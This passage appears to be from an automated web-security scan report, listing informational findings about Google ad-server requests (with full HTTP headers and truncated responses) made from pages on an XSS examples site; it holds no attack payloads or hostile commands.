User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __gads=ID=46b610ae0802f836:T=1299599836:S=ALNI_MZzdV0LZs3Dmal4yFxQFOTvWOZQJg; __ar_v4=%7CTEDYGTRZH5DVRIBZAHSESJ%3A20110318%3A1%7CGUKQZOPGUBBXJAG5MGCY3C%3A20110318%3A1%7CN34ZPOW5TRGMJKDEFHM2G4%3A20110318%3A1%7CSDUW4IOBWFCKJBD7TJN7TI%3A20110318%3A1; id=c708f553300004b|2305757/776973/15064,998766/320821/15055,1831140/746237/15055,2818894/957634/15036|t=1297805141|et=730|cs=v3vpvykb

Response

HTTP/1.1 200 OK
P3P: policyref="http://googleads.g.doubleclick.net/pagead/gcn_p3p_.xml", CP="CURa ADMa DEVa TAIo PSAo PSDo OUR IND UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"
Content-Type: text/html; charset=UTF-8
X-Content-Type-Options: nosniff
Date: Sat, 02 Apr 2011 12:54:34 GMT
Server: cafe
Cache-Control: private, x-gzip-ok=""
X-XSS-Protection: 1; mode=block
Content-Length: 12313

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd"><html><head><style>a:link,a:visited,a:hover,a:active{color:#0000ff;cursor:pointer;}body,table,div,ul,li{font-s
...[SNIP]...
<div id=abgi><a href="http://www.google.com/url?ct=abg&amp;q=https://www.google.com/adsense/support/bin/request.py%3Fcontact%3Dabg_afc%26url%3Dhttp://xss.cx/examples/html/capitalone.com.html%26hl%3Den%26client%3Dca-pub-4063878933780912%26adU%3Dwww.CapitalOne.com%26adT%3DCapital%2BOne%2BOfficial%2BSite%26adU%3Dwww.CreditCards.com%26adT%3DMasterCard%2BCredit%2BCards%26adU%3Dwww.CardRatings.com%26adT%3D10%2BBest%2BCredit%2BCards%26gl%3DUS&amp;usg=AFQjCNEYTr9d4u5migeF6VTdMgu2wvduVg" target=_blank><img alt="Ads by Google" border=0 height=16 src="http://pagead2.googlesyndication.com/pagead/abglogo/abg-en-100c-000000.png" width=78></a>
...[SNIP]...
</script><script src="http://pagead2.googlesyndication.com/pagead/sma8.js"></script>
...[SNIP]...

19.18. http://googleads.g.doubleclick.net/pagead/ads

Summary

Severity:   Information
Confidence:   Certain
Host:   http://googleads.g.doubleclick.net
Path:   /pagead/ads

Issue detail

The page was loaded from a URL containing a query string:

The response contains the following links to other domains:

Request

GET /pagead/ads?client=ca-pub-4063878933780912&output=html&h=90&slotname=2510184792&w=728&lmt=1301767107&flash=10.2.154&url=file%3A%2F%2F%2FC%3A%2Fcdn%2Fexamples%2Fhtml%2Fcapec-86-xss-cross-site-scripting-snas.nbcuni.com.html&dt=1301749107666&bpp=3&shv=r20110324&jsv=r20110321-2&correlator=1301749107685&frm=0&adk=1607234649&ga_vid=742805196.1301749108&ga_sid=1301749108&ga_hid=1298488409&ga_fc=0&u_tz=-300&u_his=26&u_java=1&u_h=1200&u_w=1920&u_ah=1156&u_aw=1920&u_cd=16&u_nplug=9&u_nmime=44&biw=998&bih=1004&fu=0&ifi=1&dtd=24&xpc=pgkSXmzPv7&p=file%3A// HTTP/1.1
Host: googleads.g.doubleclick.net
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __gads=ID=46b610ae0802f836:T=1299599836:S=ALNI_MZzdV0LZs3Dmal4yFxQFOTvWOZQJg; __ar_v4=%7CTEDYGTRZH5DVRIBZAHSESJ%3A20110318%3A1%7CGUKQZOPGUBBXJAG5MGCY3C%3A20110318%3A1%7CN34ZPOW5TRGMJKDEFHM2G4%3A20110318%3A1%7CSDUW4IOBWFCKJBD7TJN7TI%3A20110318%3A1; id=c708f553300004b|2305757/776973/15064,998766/320821/15055,1831140/746237/15055,2818894/957634/15036|t=1297805141|et=730|cs=v3vpvykb

Response

HTTP/1.1 200 OK
P3P: policyref="http://googleads.g.doubleclick.net/pagead/gcn_p3p_.xml", CP="CURa ADMa DEVa TAIo PSAo PSDo OUR IND UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"
Content-Type: text/html; charset=UTF-8
X-Content-Type-Options: nosniff
Date: Sat, 02 Apr 2011 12:57:51 GMT
Server: cafe
Cache-Control: private, x-gzip-ok=""
X-XSS-Protection: 1; mode=block
Content-Length: 4375

<html><head><style><!--
a:link { color: #000000 }a:visited { color: #000000 }a:hover { color: #000000 }a:active { color: #000000 } --></style><script><!--
(function(){window.ss=function(d,e){window.s
...[SNIP]...
<div id=abgb><img src='http://pagead2.googlesyndication.com/pagead/images/i.png' alt="(i)" border=0 height=12px width=12px/></div><div id=abgs><a href="http://www.google.com/url?ct=abg&amp;q=https://www.google.com/adsense/support/bin/request.py%3Fcontact%3Dabg_afc%26url%3Dfile:///C:/cdn/examples/html/capec-86-xss-cross-site-scripting-snas.nbcuni.com.html%26hl%3Den%26client%3Dca-pub-4063878933780912%26adU%3DPhilips.LifelineSystems.com%26adT%3DImageAd%26gl%3DUS&amp;usg=AFQjCNEj5gNM48wmsulaG6mlc9xjFUsrbw" target=_blank><img alt="Ads by Google" border=0 height=16px src=http://pagead2.googlesyndication.com/pagead/abglogo/abg-en-100c-ffffff.png width=78px/></a>
...[SNIP]...
</script><script src="http://pagead2.googlesyndication.com/pagead/js/graphics.js"></script><script src="http://pagead2.googlesyndication.com/pagead/js/abg.js"></script>
...[SNIP]...

19.19. http://googleads.g.doubleclick.net/pagead/ads

Summary

Severity:   Information
Confidence:   Certain
Host:   http://googleads.g.doubleclick.net
Path:   /pagead/ads

Issue detail

The page was loaded from a URL containing a query string:

The response contains the following links to other domains:

Request

GET /pagead/ads?client=ca-pub-4063878933780912&output=html&h=90&slotname=2510184792&w=728&lmt=1301766337&flash=10.2.154&url=file%3A%2F%2F%2FC%3A%2Fcdn%2Fexamples%2Fhtml%2Fcwe-79-xss-cross-site-scripting.www1.hilton.com.html&dt=1301748337290&bpp=3&shv=r20110324&jsv=r20110321-2&correlator=1301748337301&frm=0&adk=1607234649&ga_vid=1036254669.1301748337&ga_sid=1301748337&ga_hid=1196469354&ga_fc=0&u_tz=-300&u_his=5&u_java=1&u_h=1200&u_w=1920&u_ah=1156&u_aw=1920&u_cd=16&u_nplug=9&u_nmime=44&biw=998&bih=1004&fu=0&ifi=1&dtd=16&xpc=sFSInPVI8O&p=file%3A// HTTP/1.1
Host: googleads.g.doubleclick.net
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __gads=ID=46b610ae0802f836:T=1299599836:S=ALNI_MZzdV0LZs3Dmal4yFxQFOTvWOZQJg; __ar_v4=%7CTEDYGTRZH5DVRIBZAHSESJ%3A20110318%3A1%7CGUKQZOPGUBBXJAG5MGCY3C%3A20110318%3A1%7CN34ZPOW5TRGMJKDEFHM2G4%3A20110318%3A1%7CSDUW4IOBWFCKJBD7TJN7TI%3A20110318%3A1; id=c708f553300004b|2305757/776973/15064,998766/320821/15055,1831140/746237/15055,2818894/957634/15036|t=1297805141|et=730|cs=v3vpvykb

Response

HTTP/1.1 200 OK
P3P: policyref="http://googleads.g.doubleclick.net/pagead/gcn_p3p_.xml", CP="CURa ADMa DEVa TAIo PSAo PSDo OUR IND UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"
Content-Type: text/html; charset=UTF-8
X-Content-Type-Options: nosniff
Date: Sat, 02 Apr 2011 12:45:01 GMT
Server: cafe
Cache-Control: private, x-gzip-ok=""
X-XSS-Protection: 1; mode=block
Content-Length: 4347

<html><head><style><!--
a:link { color: #000000 }a:visited { color: #000000 }a:hover { color: #000000 }a:active { color: #000000 } --></style><script><!--
(function(){window.ss=function(d,e){window.s
...[SNIP]...
<div id=abgb><img src='http://pagead2.googlesyndication.com/pagead/images/i.png' alt="(i)" border=0 height=12px width=12px/></div><div id=abgs><a href="http://www.google.com/url?ct=abg&amp;q=https://www.google.com/adsense/support/bin/request.py%3Fcontact%3Dabg_afc%26url%3Dfile:///C:/cdn/examples/html/cwe-79-xss-cross-site-scripting.www1.hilton.com.html%26hl%3Den%26client%3Dca-pub-4063878933780912%26adU%3DPhilips.LifelineSystems.com%26adT%3DImageAd%26gl%3DUS&amp;usg=AFQjCNHlQT_TdbIf8lMv0Tb4MsRweIjuVg" target=_blank><img alt="Ads by Google" border=0 height=16px src=http://pagead2.googlesyndication.com/pagead/abglogo/abg-en-100c-ffffff.png width=78px/></a>
...[SNIP]...
</script><script src="http://pagead2.googlesyndication.com/pagead/js/graphics.js"></script><script src="http://pagead2.googlesyndication.com/pagead/js/abg.js"></script>
...[SNIP]...

19.20. http://googleads.g.doubleclick.net/pagead/ads

Summary

Severity:   Information
Confidence:   Certain
Host:   http://googleads.g.doubleclick.net
Path:   /pagead/ads

Issue detail

The page was loaded from a URL containing a query string:

The response contains the following links to other domains:

Request

GET /pagead/ads?client=ca-pub-4063878933780912&output=html&h=90&slotname=2510184792&w=728&lmt=1300998819&flash=10.2.154&url=http%3A%2F%2Fxss.cx%2Fexamples%2Fhtml%2Fcapec-86-xss-dork-cwe79-imp.fetchback.com.html&dt=1301749134308&bpp=3&shv=r20110324&jsv=r20110321-2&correlator=1301749134321&frm=0&adk=1607234649&ga_vid=1705879164.1301749134&ga_sid=1301749134&ga_hid=930736349&ga_fc=0&u_tz=-300&u_his=29&u_java=1&u_h=1200&u_w=1920&u_ah=1156&u_aw=1920&u_cd=16&u_nplug=9&u_nmime=44&biw=998&bih=1004&eid=33895132&fu=0&ifi=1&dtd=18&xpc=OPFNo6cnem&p=http%3A//xss.cx HTTP/1.1
Host: googleads.g.doubleclick.net
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __gads=ID=46b610ae0802f836:T=1299599836:S=ALNI_MZzdV0LZs3Dmal4yFxQFOTvWOZQJg; __ar_v4=%7CTEDYGTRZH5DVRIBZAHSESJ%3A20110318%3A1%7CGUKQZOPGUBBXJAG5MGCY3C%3A20110318%3A1%7CN34ZPOW5TRGMJKDEFHM2G4%3A20110318%3A1%7CSDUW4IOBWFCKJBD7TJN7TI%3A20110318%3A1; id=c708f553300004b|2305757/776973/15064,998766/320821/15055,1831140/746237/15055,2818894/957634/15036|t=1297805141|et=730|cs=v3vpvykb

Response

HTTP/1.1 200 OK
P3P: policyref="http://googleads.g.doubleclick.net/pagead/gcn_p3p_.xml", CP="CURa ADMa DEVa TAIo PSAo PSDo OUR IND UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"
Content-Type: text/html; charset=UTF-8
X-Content-Type-Options: nosniff
Date: Sat, 02 Apr 2011 12:58:18 GMT
Server: cafe
Cache-Control: private, x-gzip-ok=""
X-XSS-Protection: 1; mode=block
Content-Length: 13559

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd"><html><head><style>a:link,a:visited,a:hover,a:active{color:#0000ff;cursor:pointer;}body,table,div,ul,li{font-s
...[SNIP]...
</script><script src="http://pagead2.googlesyndication.com/pagead/js/graphics.js"></script>
...[SNIP]...
<div id=abgi><a href="http://www.google.com/url?ct=abg&amp;q=https://www.google.com/adsense/support/bin/request.py%3Fcontact%3Dabg_afc%26url%3Dhttp://xss.cx/examples/html/capec-86-xss-dork-cwe79-imp.fetchback.com.html%26hl%3Den%26client%3Dca-pub-4063878933780912%26adU%3Dwww.HostGator.com%26adT%3DHostGator%25E2%2584%25A2%2BOfficial%2BSite%26adU%3Dwww.Sentrigo.com%26adT%3DDatabase%2BSecurity%2BGuide%26adU%3Dwww.gosoftchoice.com/IBMAppScan%26adT%3DApplication%2BVulnerabilities%26gl%3DUS&amp;usg=AFQjCNGiTOoMXyc2ANi9QpCPy7XPkzkAmA" target=_blank><img alt="Ads by Google" border=0 height=16 src="http://pagead2.googlesyndication.com/pagead/abglogo/abg-en-100c-000000.png" width=78></a>
...[SNIP]...
</script><script src="http://pagead2.googlesyndication.com/pagead/sma8.js"></script>
...[SNIP]...

19.21. http://googleads.g.doubleclick.net/pagead/ads

Summary

Severity:   Information
Confidence:   Certain
Host:   http://googleads.g.doubleclick.net
Path:   /pagead/ads

Issue detail

The page was loaded from a URL containing a query string:

The response contains the following links to other domains:

Request

GET /pagead/ads?client=ca-pub-4063878933780912&output=html&h=90&slotname=2510184792&w=728&lmt=1301767155&flash=10.2.154&url=file%3A%2F%2F%2FC%3A%2Fcdn%2Fexamples%2Fhtml%2Fbloomberg.com.html&dt=1301749155074&shv=r20110324&jsv=r20110321-2&saldr=1&correlator=1301749155083&frm=0&adk=1607234649&ga_vid=398237423.1301749155&ga_sid=1301749155&ga_hid=739299924&ga_fc=0&u_tz=-300&u_his=30&u_java=1&u_h=1200&u_w=1920&u_ah=1156&u_aw=1920&u_cd=16&u_nplug=9&u_nmime=44&biw=998&bih=1004&eid=33895130&fu=0&ifi=1&dtd=13&xpc=XTXWqxCu6o&p=file%3A// HTTP/1.1
Host: googleads.g.doubleclick.net
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __gads=ID=46b610ae0802f836:T=1299599836:S=ALNI_MZzdV0LZs3Dmal4yFxQFOTvWOZQJg; __ar_v4=%7CTEDYGTRZH5DVRIBZAHSESJ%3A20110318%3A1%7CGUKQZOPGUBBXJAG5MGCY3C%3A20110318%3A1%7CN34ZPOW5TRGMJKDEFHM2G4%3A20110318%3A1%7CSDUW4IOBWFCKJBD7TJN7TI%3A20110318%3A1; id=c708f553300004b|2305757/776973/15064,998766/320821/15055,1831140/746237/15055,2818894/957634/15036|t=1297805141|et=730|cs=v3vpvykb

Response

HTTP/1.1 200 OK
P3P: policyref="http://googleads.g.doubleclick.net/pagead/gcn_p3p_.xml", CP="CURa ADMa DEVa TAIo PSAo PSDo OUR IND UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"
Content-Type: text/html; charset=UTF-8
X-Content-Type-Options: nosniff
Date: Sat, 02 Apr 2011 12:58:39 GMT
Server: cafe
Cache-Control: private, x-gzip-ok=""
X-XSS-Protection: 1; mode=block
Content-Length: 4292

<html><head><style><!--
a:link { color: #000000 }a:visited { color: #000000 }a:hover { color: #000000 }a:active { color: #000000 } --></style><script><!--
(function(){window.ss=function(d,e){window.s
...[SNIP]...
<div id=abgb><img src='http://pagead2.googlesyndication.com/pagead/images/i.png' alt="(i)" border=0 height=12px width=12px/></div><div id=abgs><a href="http://www.google.com/url?ct=abg&amp;q=https://www.google.com/adsense/support/bin/request.py%3Fcontact%3Dabg_afc%26url%3Dfile:///C:/cdn/examples/html/bloomberg.com.html%26hl%3Den%26client%3Dca-pub-4063878933780912%26adU%3DPhilips.LifelineSystems.com%26adT%3DImageAd%26gl%3DUS&amp;usg=AFQjCNEZnig5uhPHw10_FzpugddR9EObXQ" target=_blank><img alt="Ads by Google" border=0 height=16px src=http://pagead2.googlesyndication.com/pagead/abglogo/abg-en-100c-ffffff.png width=78px/></a>
...[SNIP]...
</script><script src="http://pagead2.googlesyndication.com/pagead/js/graphics.js"></script><script src="http://pagead2.googlesyndication.com/pagead/js/abg.js"></script>
...[SNIP]...

19.22. http://googleads.g.doubleclick.net/pagead/ads

Summary

Severity:   Information
Confidence:   Certain
Host:   http://googleads.g.doubleclick.net
Path:   /pagead/ads

Issue detail

The page was loaded from a URL containing a query string:

The response contains the following links to other domains:

Request

GET /pagead/ads?client=ca-pub-4063878933780912&output=html&h=90&slotname=2510184792&w=728&lmt=1300998820&flash=10.2.154&url=http%3A%2F%2Fxss.cx%2Fexamples%2Fhtml%2Fcareers.redhat.com.html&dt=1301748961724&bpp=3&shv=r20110324&jsv=r20110321-2&correlator=1301748961741&frm=0&adk=1607234649&ga_vid=584349983.1301748962&ga_sid=1301748962&ga_hid=392957726&ga_fc=0&u_tz=-300&u_his=15&u_java=1&u_h=1200&u_w=1920&u_ah=1156&u_aw=1920&u_cd=16&u_nplug=9&u_nmime=44&biw=998&bih=1004&eid=33895132&fu=0&ifi=1&dtd=22&xpc=5uo0by4EX1&p=http%3A//xss.cx HTTP/1.1
Host: googleads.g.doubleclick.net
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __gads=ID=46b610ae0802f836:T=1299599836:S=ALNI_MZzdV0LZs3Dmal4yFxQFOTvWOZQJg; __ar_v4=%7CTEDYGTRZH5DVRIBZAHSESJ%3A20110318%3A1%7CGUKQZOPGUBBXJAG5MGCY3C%3A20110318%3A1%7CN34ZPOW5TRGMJKDEFHM2G4%3A20110318%3A1%7CSDUW4IOBWFCKJBD7TJN7TI%3A20110318%3A1; id=c708f553300004b|2305757/776973/15064,998766/320821/15055,1831140/746237/15055,2818894/957634/15036|t=1297805141|et=730|cs=v3vpvykb

Response

HTTP/1.1 200 OK
P3P: policyref="http://googleads.g.doubleclick.net/pagead/gcn_p3p_.xml", CP="CURa ADMa DEVa TAIo PSAo PSDo OUR IND UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"
Content-Type: text/html; charset=UTF-8
X-Content-Type-Options: nosniff
Date: Sat, 02 Apr 2011 12:55:25 GMT
Server: cafe
Cache-Control: private, x-gzip-ok=""
X-XSS-Protection: 1; mode=block
Content-Length: 12147

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd"><html><head><style>a:link,a:visited,a:hover,a:active{color:#0000ff;cursor:pointer;}body,table,div,ul,li{font-s
...[SNIP]...
<div id=abgi><a href="http://www.google.com/url?ct=abg&amp;q=https://www.google.com/adsense/support/bin/request.py%3Fcontact%3Dabg_afc%26url%3Dhttp://xss.cx/examples/html/careers.redhat.com.html%26hl%3Den%26client%3Dca-pub-4063878933780912%26adU%3Dwww.gosoftchoice.com/IBMAppScan%26adT%3DApplication%2BVulnerabilities%26adU%3Dvulnerability.scan.qualys.com%26adT%3DFree%2BOnline%2BNetwork%2BScan%26adU%3Dwww.SQLCleanup.com%26adT%3DSQL%2BInjectionCleanup%2B%2524169%26gl%3DUS&amp;usg=AFQjCNGx3mlWb0vKD5SgYE-2LUSzC27zxQ" target=_blank><img alt="Ads by Google" border=0 height=16 src="http://pagead2.googlesyndication.com/pagead/abglogo/abg-en-100c-000000.png" width=78></a>
...[SNIP]...
</script><script src="http://pagead2.googlesyndication.com/pagead/sma8.js"></script>
...[SNIP]...

19.23. http://googleads.g.doubleclick.net/pagead/ads

Summary

Severity:   Information
Confidence:   Certain
Host:   http://googleads.g.doubleclick.net
Path:   /pagead/ads

Issue detail

The page was loaded from a URL containing a query string:

The response contains the following links to other domains:

Request

GET /pagead/ads?client=ca-pub-4063878933780912&output=html&h=90&slotname=2510184792&w=728&lmt=1300998823&flash=10.2.154&url=http%3A%2F%2Fxss.cx%2Fexamples%2Fhtml%2Fcwe-79-xss-cross-site-scripting.www1.hilton.com.html&dt=1301748341587&bpp=3&shv=r20110324&jsv=r20110321-2&correlator=1301748341598&frm=0&adk=1607234649&ga_vid=650324587.1301748342&ga_sid=1301748342&ga_hid=902371036&ga_fc=0&u_tz=-300&u_his=6&u_java=1&u_h=1200&u_w=1920&u_ah=1156&u_aw=1920&u_cd=16&u_nplug=9&u_nmime=44&biw=998&bih=1004&fu=0&ifi=1&dtd=30&xpc=zXaTt9UFho&p=http%3A//xss.cx HTTP/1.1
Host: googleads.g.doubleclick.net
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __gads=ID=46b610ae0802f836:T=1299599836:S=ALNI_MZzdV0LZs3Dmal4yFxQFOTvWOZQJg; __ar_v4=%7CTEDYGTRZH5DVRIBZAHSESJ%3A20110318%3A1%7CGUKQZOPGUBBXJAG5MGCY3C%3A20110318%3A1%7CN34ZPOW5TRGMJKDEFHM2G4%3A20110318%3A1%7CSDUW4IOBWFCKJBD7TJN7TI%3A20110318%3A1; id=c708f553300004b|2305757/776973/15064,998766/320821/15055,1831140/746237/15055,2818894/957634/15036|t=1297805141|et=730|cs=v3vpvykb

Response

HTTP/1.1 200 OK
P3P: policyref="http://googleads.g.doubleclick.net/pagead/gcn_p3p_.xml", CP="CURa ADMa DEVa TAIo PSAo PSDo OUR IND UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"
Content-Type: text/html; charset=UTF-8
X-Content-Type-Options: nosniff
Date: Sat, 02 Apr 2011 12:45:05 GMT
Server: cafe
Cache-Control: private, x-gzip-ok=""
X-XSS-Protection: 1; mode=block
Content-Length: 7468

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd"><html><head><style>a:link,a:visited,a:hover,a:active{color:#0000ff;cursor:pointer;}body,table,div,ul,li{font-s
...[SNIP]...
<div id=abgi><a href="http://www.google.com/url?ct=abg&amp;q=https://www.google.com/adsense/support/bin/request.py%3Fcontact%3Dabg_afc%26url%3Dhttp://xss.cx/examples/html/cwe-79-xss-cross-site-scripting.www1.hilton.com.html%26hl%3Den%26client%3Dca-pub-4063878933780912%26adU%3Dwww.Hilton.com%26adT%3DHilton%2B%25C2%25AE%2BOfficial%2BSite%26adU%3DInsideUp.com/Business-VoIP-Service%26adT%3DCompare%2BBusiness%2BVoIP%26adU%3Dwww.altoedge.com/tapi-boards%26adT%3DCallURL%2B8%2BLine%2BTAPI%2BBoard%26gl%3DUS&amp;usg=AFQjCNET4Y5fgQNvkNA7S9glDsQ7Apit4Q" target=_blank><img alt="Ads by Google" border=0 height=16 src="http://pagead2.googlesyndication.com/pagead/abglogo/abg-en-100c-000000.png" width=78></a>
...[SNIP]...

19.24. http://googleads.g.doubleclick.net/pagead/ads

Summary

Severity:   Information
Confidence:   Certain
Host:   http://googleads.g.doubleclick.net
Path:   /pagead/ads

Issue detail

The page was loaded from a URL containing a query string:

The response contains the following links to other domains:

Request

GET /pagead/ads?client=ca-pub-4063878933780912&output=html&h=90&slotname=2510184792&w=728&lmt=1300998819&flash=10.2.154&url=http%3A%2F%2Fxss.cx%2Fexamples%2Fhtml%2Fcapec-86-embedding-scripts-in-headers-xss-cross-site-scripting.html&dt=1301749061869&bpp=3&shv=r20110324&jsv=r20110321-2&correlator=1301749061880&frm=0&adk=1607234649&ga_vid=651718306.1301749062&ga_sid=1301749062&ga_hid=1107537743&ga_fc=0&u_tz=-300&u_his=23&u_java=1&u_h=1200&u_w=1920&u_ah=1156&u_aw=1920&u_cd=16&u_nplug=9&u_nmime=44&biw=998&bih=1004&eid=33895132&fu=0&ifi=1&dtd=16&xpc=r3dGxTIclv&p=http%3A//xss.cx HTTP/1.1
Host: googleads.g.doubleclick.net
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __gads=ID=46b610ae0802f836:T=1299599836:S=ALNI_MZzdV0LZs3Dmal4yFxQFOTvWOZQJg; __ar_v4=%7CTEDYGTRZH5DVRIBZAHSESJ%3A20110318%3A1%7CGUKQZOPGUBBXJAG5MGCY3C%3A20110318%3A1%7CN34ZPOW5TRGMJKDEFHM2G4%3A20110318%3A1%7CSDUW4IOBWFCKJBD7TJN7TI%3A20110318%3A1; id=c708f553300004b|2305757/776973/15064,998766/320821/15055,1831140/746237/15055,2818894/957634/15036|t=1297805141|et=730|cs=v3vpvykb

Response

HTTP/1.1 200 OK
P3P: policyref="http://googleads.g.doubleclick.net/pagead/gcn_p3p_.xml", CP="CURa ADMa DEVa TAIo PSAo PSDo OUR IND UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"
Content-Type: text/html; charset=UTF-8
X-Content-Type-Options: nosniff
Date: Sat, 02 Apr 2011 12:57:06 GMT
Server: cafe
Cache-Control: private, x-gzip-ok=""
X-XSS-Protection: 1; mode=block
Content-Length: 7719

<html><head><style><!--
a:link { color: #000000 }a:visited { color: #000000 }a:hover { color: #000000 }a:active { color: #000000 } --></style><script><!--
(function(){window.ss=function(d,e){window.s
...[SNIP]...
<div id=abgb><img src='http://pagead2.googlesyndication.com/pagead/images/i.png' alt="(i)" border=0 height=12px width=12px/></div><div id=abgs><a href="http://www.google.com/url?ct=abg&amp;q=https://www.google.com/adsense/support/bin/request.py%3Fcontact%3Dabg_afc%26url%3Dhttp://xss.cx/examples/html/capec-86-embedding-scripts-in-headers-xss-cross-site-scripting.html%26hl%3Den%26client%3Dca-pub-4063878933780912%26adU%3Dwww.vistaprint.com%26adT%3DImageAd%26gl%3DUS&amp;usg=AFQjCNFMZOeBKgHTNvBtIn9YQRimfHs34A" target=_blank><img alt="Ads by Google" border=0 height=16px src=http://pagead2.googlesyndication.com/pagead/abglogo/abg-en-100c-ffffff.png width=78px/></a>
...[SNIP]...
</script><script src="http://pagead2.googlesyndication.com/pagead/js/graphics.js"></script><script src="http://pagead2.googlesyndication.com/pagead/js/abg.js"></script>
...[SNIP]...

19.25. http://googleads.g.doubleclick.net/pagead/ads

Summary

Severity:   Information
Confidence:   Certain
Host:   http://googleads.g.doubleclick.net
Path:   /pagead/ads

Issue detail

The page was loaded from a URL containing a query string:

The response contains the following links to other domains:

Request

GET /pagead/ads?client=ca-pub-4063878933780912&output=html&h=90&slotname=2510184792&w=728&lmt=1300998814&flash=10.2.154&url=http%3A%2F%2Fxss.cx%2Fexamples%2Fhtml%2Fbostonherald.com.html&dt=1301749231100&bpp=3&shv=r20110324&jsv=r20110321-2&correlator=1301749231111&frm=0&adk=1607234649&ga_vid=1958673198.1301749231&ga_sid=1301749231&ga_hid=1579418915&ga_fc=0&u_tz=-300&u_his=37&u_java=1&u_h=1200&u_w=1920&u_ah=1156&u_aw=1920&u_cd=16&u_nplug=9&u_nmime=44&biw=998&bih=1004&fu=0&ifi=1&dtd=29&xpc=oQMWdMheiJ&p=http%3A//xss.cx HTTP/1.1
Host: googleads.g.doubleclick.net
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
